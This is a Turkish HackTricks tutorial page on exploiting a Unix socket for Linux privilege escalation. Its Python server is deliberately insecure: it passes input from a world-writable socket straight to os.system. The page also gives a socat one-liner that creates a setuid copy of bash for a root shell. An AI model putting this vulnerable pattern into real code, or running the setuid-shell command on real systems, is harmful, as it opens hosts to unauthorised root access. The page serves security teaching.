4.4 KiB
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Family koleksiyonumuzdaki özel NFT'leri keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Python ile Soket Bağlama Örneği
Aşağıdaki örnekte, bir unix soketi (/tmp/socket_test.s
) oluşturulur ve alınan her şey os.system
tarafından çalıştırılır. Bunu gerçek dünyada bulamayacağınızı biliyorum, ancak bu örneğin amacı, unix soketlerini kullanan bir kodun nasıl göründüğünü ve en kötü durumda girişi nasıl yöneteceğinizi görmektir.
{% code title="s.py" %}
import socket
import os, os.path
import time
from collections import deque
if os.path.exists("/tmp/socket_test.s"):
os.remove("/tmp/socket_test.s")
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind("/tmp/socket_test.s")
os.system("chmod o+w /tmp/socket_test.s")
while True:
server.listen(1)
conn, addr = server.accept()
datagram = conn.recv(1024)
if datagram:
print(datagram)
os.system(datagram)
conn.close()
{% endcode %}
Kodu python kullanarak çalıştırın: python s.py
ve soketin nasıl dinlediğini kontrol edin:
netstat -a -p --unix | grep "socket_test"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s
Exploit (Sömürü)
Bir sistemdeki güvenlik açıklarını kullanarak yetkilendirme düzeyini yükseltmek veya hedef sisteme izinsiz erişim sağlamak için kullanılan bir tekniktir. Sistemdeki zayıf noktaları hedefleyerek, saldırganlar bu açıkları kullanarak hedef sistemi ele geçirebilir veya kontrol edebilirler. Sömürü, genellikle bir yazılım hatasını veya konfigürasyon hatasını hedef alır ve saldırganlara hedef sisteme erişim sağlama imkanı verir. Sömürü teknikleri, saldırganların hedef sistemi ele geçirmek veya yetkilendirme düzeyini yükseltmek için kullanabilecekleri çeşitli yöntemleri içerir. Bu yöntemler arasında buffer overflow, SQL enjeksiyonu, komut enjeksiyonu ve kimlik avı gibi teknikler bulunur. Sömürü, siber saldırganların hedef sistemdeki hassas verilere erişim sağlamasına ve kontrolünü ele geçirmesine olanak tanır. Bu nedenle, sistemlerin güvenliğini sağlamak için güncellemelerin düzenli olarak yapılması ve güvenlik açıklarının düzeltilmesi önemlidir.
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.